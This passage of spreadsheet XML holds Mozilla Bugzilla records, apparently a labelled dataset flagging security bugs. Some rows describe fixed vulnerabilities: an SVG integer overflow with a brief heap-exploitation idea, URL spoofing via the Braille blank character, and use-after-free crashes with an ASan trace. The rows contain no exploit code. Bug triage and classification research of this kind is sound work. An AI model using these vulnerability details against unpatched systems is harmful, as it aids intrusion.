      </c>
      <c r="B4801" t="inlineStr">
        <is>
          <t>2006-01-03 08:46:07 -0800</t>
        </is>
      </c>
      <c r="C4801" t="inlineStr">
        <is>
          <t>CVE-2006-0297 integer overflow in nsSVGCairoSurface::Init and nsCanvasRenderingContext2D</t>
        </is>
      </c>
      <c r="D4801" t="inlineStr">
        <is>
          <t>2009-04-24 11:24:11 -0700</t>
        </is>
      </c>
      <c r="E4801" t="n">
        <v>1</v>
      </c>
      <c r="F4801" t="n">
        <v>1</v>
      </c>
      <c r="G4801" t="n">
        <v>3</v>
      </c>
      <c r="H4801" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4801" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4801" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K4801" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4801" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4801" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4801" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4801" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4801" t="inlineStr">
        <is>
          <t>[sg:critical] need svg fix on branch; cairo fix landed</t>
        </is>
      </c>
      <c r="Q4801" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4801" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4801" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4801" t="n">
        <v>1</v>
      </c>
      <c r="U4801" t="n">
        <v>0</v>
      </c>
      <c r="V4801" t="n">
        <v>45</v>
      </c>
      <c r="W4801" t="inlineStr">
        <is>
          <t>in nsSVGCairoSurface::Init 
  mData = new PRUint8[4*width*height];
this may overflow due to int too big.
potential exploit may be:
making a hole lower on the heap with as much memory above it, mData gets there
placing C objects in the upper heap, then a race from another thread
uses the fecked data. not sure though.
same construct:
nsCanvasRenderingContext2D.cpp
    nsAutoArrayPtr&lt;PRUint8&gt; tmpBuf(new PRUint8[aSurfaceSize.width*aSurfaceSize.height*4]);
testcase to follow.</t>
        </is>
      </c>
      <c r="X4801" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4802">
      <c r="A4802" t="n">
        <v>1017247</v>
      </c>
      <c r="B4802" t="inlineStr">
        <is>
          <t>2014-05-28 14:45:00 -0700</t>
        </is>
      </c>
      <c r="C4802" t="inlineStr">
        <is>
          <t>[Gaia] May 26 - May 27 - 100 - 150ms Launch Regression Across Multiple Apps</t>
        </is>
      </c>
      <c r="D4802" t="inlineStr">
        <is>
          <t>2014-10-29 15:49:15 -0700</t>
        </is>
      </c>
      <c r="E4802" t="n">
        <v>1</v>
      </c>
      <c r="F4802" t="n">
        <v>1</v>
      </c>
      <c r="G4802" t="n">
        <v>6</v>
      </c>
      <c r="H4802" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4802" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4802" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K4802" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4802" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4802" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4802" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4802" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4802" t="inlineStr">
        <is>
          <t>[c=regression p= s=2014.07.18.t u=2.0][systemsfe]</t>
        </is>
      </c>
      <c r="Q4802" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4802" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4802" t="inlineStr">
        <is>
          <t>2.0 S6 (18july)</t>
        </is>
      </c>
      <c r="T4802" t="n">
        <v>1</v>
      </c>
      <c r="U4802" t="n">
        <v>0</v>
      </c>
      <c r="V4802" t="n">
        <v>53</v>
      </c>
      <c r="W4802" t="inlineStr">
        <is>
          <t>good
Gaia Revision: 6a391274cd436f8f
Gecko Revision: ca042038cdee
bad
gaia Revision: bc6f07c149770c6e
Gecko Revision: 448f2153d6d3
50ms comes from 1016483. 100ms coming from something else.</t>
        </is>
      </c>
      <c r="X4802" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4803">
      <c r="A4803" t="n">
        <v>340356</v>
      </c>
      <c r="B4803" t="inlineStr">
        <is>
          <t>2006-06-04 18:30:15 -0700</t>
        </is>
      </c>
      <c r="C4803" t="inlineStr">
        <is>
          <t>Outline strict requirements for SoC Debugging improvements</t>
        </is>
      </c>
      <c r="D4803" t="inlineStr">
        <is>
          <t>2018-10-16 12:20:08 -0700</t>
        </is>
      </c>
      <c r="E4803" t="n">
        <v>1</v>
      </c>
      <c r="F4803" t="n">
        <v>1</v>
      </c>
      <c r="G4803" t="n">
        <v>6</v>
      </c>
      <c r="H4803" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4803" t="inlineStr">
        <is>
          <t>Other Applications Graveyard</t>
        </is>
      </c>
      <c r="J4803" t="inlineStr">
        <is>
          <t>Venkman JS Debugger</t>
        </is>
      </c>
      <c r="K4803" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L4803" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4803" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4803" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4803" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4803" t="inlineStr"/>
      <c r="Q4803" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4803" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4803" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4803" t="n">
        <v>1</v>
      </c>
      <c r="U4803" t="n">
        <v>0</v>
      </c>
      <c r="V4803" t="n">
        <v>2</v>
      </c>
      <c r="W4803" t="inlineStr">
        <is>
          <t>As in summary.</t>
        </is>
      </c>
      <c r="X4803" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4804">
      <c r="A4804" t="n">
        <v>834985</v>
      </c>
      <c r="B4804" t="inlineStr">
        <is>
          <t>2013-01-25 17:57:34 -0800</t>
        </is>
      </c>
      <c r="C4804" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.16 Beta 2</t>
        </is>
      </c>
      <c r="D4804" t="inlineStr">
        <is>
          <t>2013-01-29 23:16:49 -0800</t>
        </is>
      </c>
      <c r="E4804" t="n">
        <v>1</v>
      </c>
      <c r="F4804" t="n">
        <v>1</v>
      </c>
      <c r="G4804" t="n">
        <v>2</v>
      </c>
      <c r="H4804" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4804" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4804" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K4804" t="inlineStr">
        <is>
          <t>SeaMonkey 2.16 Branch</t>
        </is>
      </c>
      <c r="L4804" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4804" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4804" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4804" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4804" t="inlineStr"/>
      <c r="Q4804" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4804" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4804" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4804" t="n">
        <v>1</v>
      </c>
      <c r="U4804" t="n">
        <v>0</v>
      </c>
      <c r="V4804" t="n">
        <v>3</v>
      </c>
      <c r="W4804" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.16 Beta 2
We expect an actual release on Sunday 27th January.</t>
        </is>
      </c>
      <c r="X4804" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4805">
      <c r="A4805" t="n">
        <v>1629506</v>
      </c>
      <c r="B4805" t="inlineStr">
        <is>
          <t>2020-04-13 03:32:31 -0700</t>
        </is>
      </c>
      <c r="C4805" t="inlineStr">
        <is>
          <t>U+2800 (Braille blank) is displayed as a blank; treat as a space and encode</t>
        </is>
      </c>
      <c r="D4805" t="inlineStr">
        <is>
          <t>2024-05-30 10:13:38 -0700</t>
        </is>
      </c>
      <c r="E4805" t="n">
        <v>1</v>
      </c>
      <c r="F4805" t="n">
        <v>1</v>
      </c>
      <c r="G4805" t="n">
        <v>2</v>
      </c>
      <c r="H4805" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4805" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4805" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4805" t="inlineStr">
        <is>
          <t>75 Branch</t>
        </is>
      </c>
      <c r="L4805" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4805" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4805" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4805" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4805" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main77+]</t>
        </is>
      </c>
      <c r="Q4805" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4805" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4805" t="inlineStr">
        <is>
          <t>Firefox 77</t>
        </is>
      </c>
      <c r="T4805" t="n">
        <v>1</v>
      </c>
      <c r="U4805" t="n">
        <v>0</v>
      </c>
      <c r="V4805" t="n">
        <v>18</v>
      </c>
      <c r="W4805" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Steps to reproduce:
invisible charaters such as "space" are usually converted into code when they come after the URL for example, http://google.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20index.html
There are some characters such as “⠀” (U+2800) which are not converted into code when added after the URL which may lead to URL spoofing using RTL characters since this area is really a messy area.
Actual results:
Shown as a blank space
Expected results:
Shoud be converted into code.</t>
        </is>
      </c>
      <c r="X4805" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4806">
      <c r="A4806" t="n">
        <v>806483</v>
      </c>
      <c r="B4806" t="inlineStr">
        <is>
          <t>2012-10-29 11:40:09 -0700</t>
        </is>
      </c>
      <c r="C4806" t="inlineStr">
        <is>
          <t>Heap-use-after-free (read) nsIFrame::GetStyleContext</t>
        </is>
      </c>
      <c r="D4806" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:08 -0800</t>
        </is>
      </c>
      <c r="E4806" t="n">
        <v>1</v>
      </c>
      <c r="F4806" t="n">
        <v>1</v>
      </c>
      <c r="G4806" t="n">
        <v>3</v>
      </c>
      <c r="H4806" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4806" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4806" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4806" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4806" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4806" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4806" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4806" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4806" t="inlineStr">
        <is>
          <t>[asan][qa-][adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q4806" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4806" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4806" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T4806" t="n">
        <v>1</v>
      </c>
      <c r="U4806" t="n">
        <v>0</v>
      </c>
      <c r="V4806" t="n">
        <v>26</v>
      </c>
      <c r="W4806" t="inlineStr">
        <is>
          <t>Created attachment 676246
ASAN dump
ASAN debug build on Linux64, compiled with
ac_add_options --enable-optimize="-faddress-sanitizer -Dxmalloc=myxmalloc -DDEBUG_TRACEMALLOC_PRESARENA"
ac_add_options --enable-debug
That is, disabling the pres shell arena.
STEPS TO REPRODUCE
1. run Firefox with a fresh profile
2. click on a menu item, say Tools, then close it
3. exit
ACTUAL RESULTS
==8983== ERROR: AddressSanitizer heap-use-after-free on address 0x7ff31bfc6aa0 at pc 0x7ff35b68f777 bp 0x7fff120279d0 sp 0x7fff120279c8
READ of size 8 at 0x7ff31bfc6aa0 thread T0
    #0 0x7ff35b68f777 in nsIFrame::GetStyleContext() const ???:0
    #1 0x7ff35b68f2c3 in nsIFrame::PresContext() const ../../dist/include/nsIFrame.h:572
    #2 0x7ff35b962a99 in nsIFrame::Properties() const layout/svg/../generic/nsIFrame.h:2619
    #3 0x7ff35b965dd5 in ~DisplayItemData layout/base/FrameLayerBuilder.cpp:142
    #4 0x7ff35b9aa50a in mozilla::FrameLayerBuilder::DisplayItemData::Release() layout/base/FrameLayerBuilder.h:498
    #5 0x7ff35b9aa1de in ~nsRefPtr layout/base/../../dist/include/nsAutoPtr.h:874
    #6 0x7ff35b97a183 in ~nsRefPtr layout/base/../../dist/include/nsAutoPtr.h:875
    #7 0x7ff35ba1074d in ~nsRefPtrHashKey layout/base/../../dist/include/nsHashKeys.h:294
    #8 0x7ff35ba10633 in ~nsRefPtrHashKey layout/base/../../dist/include/nsHashKeys.h:294
    #9 0x7ff35ba0ff64 in nsTHashtable&lt;nsRefPtrHashKey&lt;mozilla::FrameLayerBuilder::DisplayItemData&gt; &gt;::s_ClearEntry(PLDHashTable*, PLDHashEntryHdr*) layout/base/../../dist/include/nsTHashtable.h:464
    #10 0x7ff3676a1e3e in PL_DHashTableFinish xpcom/build/pldhash.cpp:363
    #11 0x7ff35ba0f503 in ~nsTHashtable layout/base/../../dist/include/nsTHashtable.h:385
    #12 0x7ff35ba0f3a3 in ~nsTHashtable layout/base/../../dist/include/nsTHashtable.h:385
    #13 0x7ff35ba0f289 in ~LayerManagerData layout/base/FrameLayerBuilder.cpp:185
    #14 0x7ff35ba0eff3 in ~LayerManagerData layout/base/FrameLayerBuilder.cpp:185
    #15 0x7ff35ba0f10b in ~LayerManagerData layout/base/FrameLayerBuilder.cpp:183
    #16 0x7ff35b9c3de2 in LayerManagerUserDataDestroy layout/base/../../dist/include/Layers.h:119
    #17 0x7ff35b8c3ca3 in mozilla::gfx::UserData::Destroy() gfx/2d/UserData.h:98
    #18 0x7ff3683d6d64 in mozilla::layers::LayerManager::Destroy() gfx/layers/Layers.h:164
    #19 0x7ff3656bc710 in nsWindow::Destroy() widget/gtk2/nsWindow.cpp:618
    #20 0x7ff35fdb1f40 in nsView::DestroyWidget() view/src/nsView.cpp:108
    #21 0x7ff35fdb0ab0 in ~nsView view/src/nsView.cpp:92
    #22 0x7ff35fdb021b in ~nsView view/src/nsView.cpp:43
    #23 0x7ff35fdb1042 in nsIView::Destroy() view/src/nsView.cpp:152
    #24 0x7ff35c426031 in nsFrame::DestroyFrom(nsIFrame*) layout/generic/nsFrame.cpp:674
    #25 0x7ff35c84237a in nsSplittableFrame::DestroyFrom(nsIFrame*) layout/generic/nsSplittableFrame.cpp:44
    #26 0x7ff35c3d23a9 in nsContainerFrame::DestroyFrom(nsIFrame*) layout/generic/nsContainerFrame.cpp:238
    #27 0x7ff35d430435 in nsBoxFrame::DestroyFrom(nsIFrame*) layout/xul/base/src/nsBoxFrame.cpp:949
    #28 0x7ff35d58d140 in nsMenuPopupFrame::DestroyFrom(nsIFrame*) layout/xul/base/src/nsMenuPopupFrame.cpp:1827
...</t>
        </is>
      </c>
      <c r="X4806" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4807">
      <c r="A4807" t="n">
        <v>937582</v>
      </c>
      <c r="B4807" t="inlineStr">
        <is>
          <t>2013-11-12 04:58:33 -0800</t>
        </is>
      </c>
      <c r="C4807" t="inlineStr">
        <is>
          <t>nsPrefetchNode use-after-free</t>
        </is>
      </c>
      <c r="D4807" t="inlineStr">
        <is>
          <t>2015-02-25 20:20:32 -0800</t>
        </is>
      </c>
      <c r="E4807" t="n">
        <v>1</v>
      </c>
      <c r="F4807" t="n">
        <v>1</v>
      </c>
      <c r="G4807" t="n">
        <v>3</v>
      </c>
      <c r="H4807" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4807" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4807" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4807" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4807" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4807" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4807" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4807" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4807" t="inlineStr">
        <is>
          <t>[asan][fuzzblocker][adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q4807" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4807" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4807" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T4807" t="n">
        <v>1</v>
      </c>
      <c r="U4807" t="n">
        <v>0</v>
      </c>
      <c r="V4807" t="n">
        <v>37</v>
      </c>
      <c r="W4807" t="inlineStr">
        <is>
          <t>Created attachment 830779
ASan stacks (A)
About a third of the time, just starting Firefox (pointing at Bugzilla?) and shutting it down triggers a use-after-free of an nsPrefetchNode.</t>
        </is>
      </c>
      <c r="X4807" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4808">
      <c r="A4808" t="n">
        <v>991981</v>
      </c>
      <c r="B4808" t="inlineStr">
        <is>
          <t>2014-04-03 17:58:49 -0700</t>
        </is>
      </c>
      <c r="C4808" t="inlineStr">
        <is>
          <t>Lingering issues after bug 982974</t>
        </is>
      </c>
      <c r="D4808" t="inlineStr">
        <is>
          <t>2015-08-30 12:11:47 -0700</t>
        </is>
      </c>
      <c r="E4808" t="n">
        <v>1</v>
      </c>
      <c r="F4808" t="n">
        <v>1</v>
      </c>
      <c r="G4808" t="n">
        <v>3</v>
      </c>
      <c r="H4808" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4808" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4808" t="inlineStr">
        <is>
          <t>JavaScript: Standard Library</t>
        </is>
      </c>
      <c r="K4808" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4808" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4808" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4808" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4808" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4808" t="inlineStr">
        <is>
          <t>[reviewers: read comment 133][qa-][adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q4808" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4808" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4808" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T4808" t="n">
        <v>1</v>
      </c>
      <c r="U4808" t="n">
        <v>0</v>
      </c>
      <c r="V4808" t="n">
        <v>215</v>
      </c>
      <c r="W4808" t="inlineStr">
        <is>
          <t>To be elaborated after I'm sure this bug's been filed with the right security bits set to keep it hidden, given we now have multiple security-sensitive checkboxen to consider.</t>
        </is>
      </c>
      <c r="X4808" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4809">
      <c r="A4809" t="n">
        <v>1173730</v>
      </c>
      <c r="B4809" t="inlineStr">
        <is>
          <t>2015-06-11 04:56:03 -0700</t>
        </is>
      </c>
      <c r="C4809" t="inlineStr">
        <is>
          <t>Use solid tab separator image on Windows 8 and 10</t>
        </is>
      </c>
      <c r="D4809" t="inlineStr">
        <is>
          <t>2015-08-31 14:50:59 -0700</t>
        </is>
      </c>
      <c r="E4809" t="n">
        <v>1</v>
      </c>
      <c r="F4809" t="n">
        <v>1</v>
      </c>
      <c r="G4809" t="n">
        <v>2</v>
      </c>
      <c r="H4809" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4809" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4809" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K4809" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4809" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4809" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N4809" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4809" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4809" t="inlineStr"/>
      <c r="Q4809" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4809" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4809" t="inlineStr">
        <is>
          <t>Firefox 41</t>
        </is>
      </c>
      <c r="T4809" t="n">
        <v>1</v>
      </c>
      <c r="U4809" t="n">
        <v>0</v>
      </c>
      <c r="V4809" t="n">
        <v>23</v>
      </c>
      <c r="W4809" t="inlineStr">
        <is>
          <t>Need to figure out if we need to actually use an image for this or whether plain CSS can do the job.</t>
        </is>
      </c>
      <c r="X4809" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4810">
      <c r="A4810" t="n">
        <v>1140616</v>
      </c>
      <c r="B4810" t="inlineStr">
        <is>
          <t>2015-03-06 15:13:10 -0800</t>
        </is>
      </c>
      <c r="C4810" t="inlineStr">
        <is>
          <t>crashes in GC with Java applet</t>
        </is>
      </c>
      <c r="D4810" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E4810" t="n">
        <v>1</v>
      </c>
      <c r="F4810" t="n">
        <v>1</v>
      </c>
      <c r="G4810" t="n">
        <v>6</v>
      </c>
      <c r="H4810" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4810" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4810" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K4810" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L4810" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4810" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4810" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4810" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4810" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q4810" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4810" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4810" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T4810" t="n">
        <v>1</v>
      </c>
      <c r="U4810" t="n">
        <v>5</v>
      </c>
      <c r="V4810" t="n">
        <v>90</v>
      </c>
      <c r="W4810" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150305021524
Steps to reproduce:
We have internal Enterprise application that runs mix of GWT javascript and Java applets in browser (that is why providing link is not feasible). Lately we have noticed that whenever Java applet is involved, Firefox will crash. Not necessarily right away, but working with application in areas that involve Java applet will sooner or later always cause crash. There are no exact steps to reproduce issue as it looks to be different every time, but end result is always the same.
It looks to happen when either applet is about to be loaded or removed by Javascript. Which is done by adding and removing "embed" tag to document. When started, Java applet itself seems to be running always ok.
This problem happens with Firefox 35.0, 35.1, 36, 37 and 38. Not reproducible using Firefox 34, Firefox ESR 31.5. Neither it is reproducible with Chrome or Internet Explorer, any version.
OS is Windows 7 Enterprise (but reproduced on other various Windows OSes), problem reproduced with Java 7 update 72 and 75, Java 8 update 31 and 40.
Actual results:
https://crash-stats.mozilla.com/report/index/bp-457abcba-67c2-4d84-bd3a-68b652150306
https://crash-stats.mozilla.com/report/index/bp-19c7d138-3d35-4e15-957b-cb18b2150306
https://crash-stats.mozilla.com/report/index/bp-dacefcb6-59c9-430e-a38b-1ca002150306
https://crash-stats.mozilla.com/report/index/bp-0e43153f-1cf4-4a81-a233-44deb2150306
https://crash-stats.mozilla.com/report/index/bp-c03f84f6-e303-4332-bac7-907dd2150306
https://crash-stats.mozilla.com/report/index/bp-e4b683ce-2aa1-42f3-8791-4fef72150305
https://crash-stats.mozilla.com/report/index/bp-c9ae0a6a-5f90-42aa-a469-e031a2150305
https://crash-stats.mozilla.com/report/index/bp-9c023cba-8c77-4000-b751-3dcdf2150305
https://crash-stats.mozilla.com/report/index/bp-4a372eb0-43ca-4916-b0fe-3db012150305
https://crash-stats.mozilla.com/report/index/bp-00a4dbed-7a11-418e-b9b7-7720d2150213
Expected results:
no crashes</t>
        </is>
      </c>
      <c r="X4810" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4811">
      <c r="A4811" t="n">
        <v>1164208</v>
      </c>
      <c r="B4811" t="inlineStr">
        <is>
          <t>2015-05-12 13:50:46 -0700</t>
        </is>
      </c>
      <c r="C4811" t="inlineStr">
        <is>
          <t>Update Pocket code to latest version (May 11th code drop)</t>
        </is>
      </c>
      <c r="D4811" t="inlineStr">
        <is>
          <t>2015-05-18 05:17:55 -0700</t>
        </is>
      </c>
      <c r="E4811" t="n">
        <v>1</v>
      </c>
      <c r="F4811" t="n">
        <v>1</v>
      </c>
      <c r="G4811" t="n">
        <v>2</v>
      </c>
      <c r="H4811" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4811" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4811" t="inlineStr">
        <is>
          <t>Pocket</t>
        </is>
      </c>
      <c r="K4811" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4811" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4811" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4811" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4811" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4811" t="inlineStr"/>
      <c r="Q4811" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4811" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4811" t="inlineStr">
        <is>
          <t>Firefox 41</t>
        </is>
      </c>
      <c r="T4811" t="n">
        <v>1</v>
      </c>
      <c r="U4811" t="n">
        <v>0</v>
      </c>
      <c r="V4811" t="n">
        <v>10</v>
      </c>
      <c r="W4811" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1163360 +++
https://github.com/Pocket/Firefox/pull/72
Updates:
    Fixed error handling response (bug 1163316)
    Fixed http links that should have been https
    Added learn more link ab test
    Fixed unicode error message handling
    Fixed suggested tags missing on first use (bug 1163614)</t>
        </is>
      </c>
      <c r="X4811" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4812">
      <c r="A4812" t="n">
        <v>567376</v>
      </c>
      <c r="B4812" t="inlineStr">
        <is>
          <t>2010-05-21 09:56:22 -0700</t>
        </is>
      </c>
      <c r="C4812" t="inlineStr">
        <is>
          <t>Try server emails aren't showing the changeset</t>
        </is>
      </c>
      <c r="D4812" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4812" t="n">
        <v>1</v>
      </c>
      <c r="F4812" t="n">
        <v>1</v>
      </c>
      <c r="G4812" t="n">
        <v>5</v>
      </c>
      <c r="H4812" t="inlineStr">
